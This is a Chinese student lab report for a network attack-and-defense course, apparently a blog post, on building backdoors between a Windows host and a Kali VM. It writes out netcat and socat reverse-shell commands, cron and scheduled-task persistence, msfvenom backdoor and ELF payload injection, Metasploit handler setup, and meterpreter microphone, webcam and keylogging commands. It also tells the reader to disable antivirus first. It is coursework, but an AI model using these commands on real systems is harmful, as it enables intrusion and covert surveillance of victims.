20232416 2025-2026-1《网络与系统攻防技术》实验二实验报告

20232416 2025-2026-1《网络与系统攻防技术》实验二实验报告

1.实验内容

(1)使用nc实现win,Linux间的后门连接
(2)meterpreter的应用
(3)MSF POST模块的应用

2.实验目标

  学习Netcat、Socat、Meterpreter生成等技术,最终可以达到使用MSF meterpreter生成后门程序获取目标主机音频、摄像头、击键记录等内容的目的。

3.回答问题

3.1 列举你能想到的一个后门进入到你系统中的可能方式

  钓鱼软件、社会工程学

3.2 列举你知道的后门如何启动起来(windows及linux)的方式

  计划任务启动以及自动启动

3.3 Meterpreter有哪些给你映像深刻的功能

  功能强大,尤其是能够对你进行长时间的监控并录像

3.4 如何发现自己有系统有没有被安装后门

  通过任务管理器查看是否存在异常进程

4.实验过程

4.1 前提工作

  首先将已运行的防护设施全部关闭,例如“病毒和威胁防护”、“防火墙和网络保护”等内容全部关闭(如果电脑上存在360安全卫士等杀毒软件也必须完全关掉)
image

4.2 使用netcat获取物理机操作Shell,并通过cron启动

  首先获取本机IP,本机IP为192.168.1.107
IP地址
  在物理机上,进入PowerShell并输入指令./nc64.exe -l -p 2416,通过该命令监听端口2416,此时打开kali虚拟机,在中虚拟机终端输入命令nc 192.168.1.107 2416 -e /bin/sh,然后等待连接成功后物理机就获得了kali虚拟机的Shell
监听情况
获得虚拟机Shell
  修改虚拟机中cron内容,通过命令crontab -e可编辑cron文件,可指定特定时间自动运行
kali反弹
  通过命令* * * * * /bin/netcat 192.168.1.107 2416 -e /bin/sh可实现每分钟运行一次
  通过命令 crontab -l可以查看是否修改成功
查看配置可得配置已成功
  此时切换到物理机进行监听,可以发现每分钟就可以获得一个kali虚拟机的Shell并且输入指令可以正常使用
验证每分钟可获取Kali Shall

4.3 使用socat获取物理机Shell,同时设置可定时触发任务

  首先配置好socat环境,然后输入命令/socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr进行端口监听,端口号为8888,当存在kali访问连接时会出现一个cmd.exe
Windows反弹连接到Kali并提供一个cmd.exe作为Shell
  通过命令socat - tcp:192.168.1.107:8888来连接主机Shell
socat连接
  连接成功,此时我们可以设置定时任务,设置详情如下:
任务触发器
启动程序条件
启动时间
  此处可以发现我的主机IP与之前不同,因为实验环境从宿舍换到了教室
  我设置的任务触发时间为每天下午13:02,启动程序即cmd.exe.可以从下方截图看到,当时间进行到下午13:02时,自动弹出一个cmd.exe,此时在kali虚拟机输入socat - tcp:192.168.1.107:8888可以获取触发任务的Shell
触发器设置成功

4.4 使用MSF meterpreter生成后门,获取物理机资源并尝试提权,最终使用MSF生成shellcode连接Shell

  在虚拟机中使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.46.128 LPORT=8888 -f exe > 20232416_backdoor.exe生成可执行的后门文件,并且传输到物理机。kali开启nc命令为nc -l 8888 <20232416_backdoor.exe,物理机开启nc命令ncat.exe -l 8888 >20232416_backdoor.exe
地址更改_生成后门文件
kali开启nc
主机开启nc
  物理机后门程序建立成功
物理机后门程序建立成功
  在kali虚拟机的终端输入指令msfconsole,打开控制台界面,对监听模块配置,命令如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.46.128
set LPORT 8888 
exploit 

  配置成功启动监听模块后,双击运行物理机上的后门文件,然后可以在kali虚拟机上操作Shell
成功获得Shell
  在Meterpreter会话中输入常用渗透命令,进一步获取信息,命令及截图(分别是音频、拍照前门、拍照后门、获取击键内容)如下:

record_mic 
screenshot 
webcam_snap 
keyscan_start 
keyscan_dump 

音频
拍照前门
拍照后门
获取击键内容
  尝试提权,我们可以发现当前用户依旧时ASUS,无法提权成功,命令及截图如下:

getsystem
getuid

提权失败
  使用MSF生成shellcode并连接Shell,通过命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.46.128 LPORT=8888 -x /home/kali/Desktop/pwn20232416-0 -f elf > pwn20232416-1
  生成Shellcode并注入到/home/kali/Desktop/pwn20232416-0中,同时使用命令sudo chmod a+x pwn20232416-1将执行权限放给所有用户
image
  另起一个Shell进行监听配置,命令如下:

use exploit/multi/handler
 set payload linux/x86/meterpreter/reverse_tcp
 set LHOST 192.168.46.128
 set LPORT 8888

image
  在最后获得Shell中输入ls命令检验是否成功
Shellcode注入完成远程连接

5. 问题及解决

5.1 连接中断问题

  在输入命令nc 192.168.1.107 2416 -e /bin/sh后,显示:(未知)拒绝连接
问题1
  在kali虚拟机让渡控制权时,物理机命令运行出现未知情况的中断导致拒绝连接。这个问题仅在第一次运行时出现,后续均未出现,判断可能是进程冲突等问题,重新运行即可

5.2 后门程序无法运行问题

  在将kali虚拟机上生成的后门程序通过ncat传输到物理机上时,发现总是出现后门程序无法运行的问题,无论以什么命令都不行
后门文件无法运行问题
  后借鉴同学的经验发现可能是ncat传输问题,最好将kali虚拟机(VMware)中生成的20232416_backdoor.exe复制粘贴到物理机上,但是我的kali虚拟机再次出现问题
后门文件无法运行问题解决过程问题
  如你所见,我的kali虚拟机无法将/root/20232416_backdoor.exe复制到物理机桌面,我尝试使用Winscp、MobaXtrem等工具来传输,结果依旧存在问题,它提示我操作权限不足,即使我使用root权限,我发现真正的问题在20232416_backdoor.exe程序本身上。于是,我排查一番后尝试在生成该后门程序时先进入/home/kali/Desktop,这样生成的20232416_backdoor.exe程序不会存在于/root文件夹下,我们就有足够的操作权限,尝试后发现,这一次的20232416_backdoor.exe程序可以正常复制粘贴到物理机上,并且可以正常使用,成功了!!!

6. 心得体会

  通过本次后门技术与渗透测试实验,我不仅初步掌握了Netcat、Socat工具实现跨系统后门连接、利用Meterpreter生成后门获取目标设备资源等实操技能,还深刻体会到网络安全的攻防博弈。实验中,从用cron和Windows任务计划程序实现后门持久化,到亲身体验Meterpreter监控音频、摄像头和键盘输入的强大功能,我直观认识到简单工具经恶意配置后的威胁性,也意识到系统安全隐患常藏于细节之中——比如关闭防护软件的疏忽、对未知文件的轻信都可能成为攻击突破口。同时,实验中遇到的连接中断、后门程序传输权限等问题并成功解决,让我由衷欣喜。或许我还并未完全掌握这一技术,但是,一次又一次碰壁到一次又一次地破壁使我动力更加充足,同时让我更清晰理解了防火墙、权限管理等防御措施的重要性以及提升安全防护意识地重要性。

posted @ 2025-10-22 22:57  问我回家发给我  阅读(6)  评论(1)    收藏  举报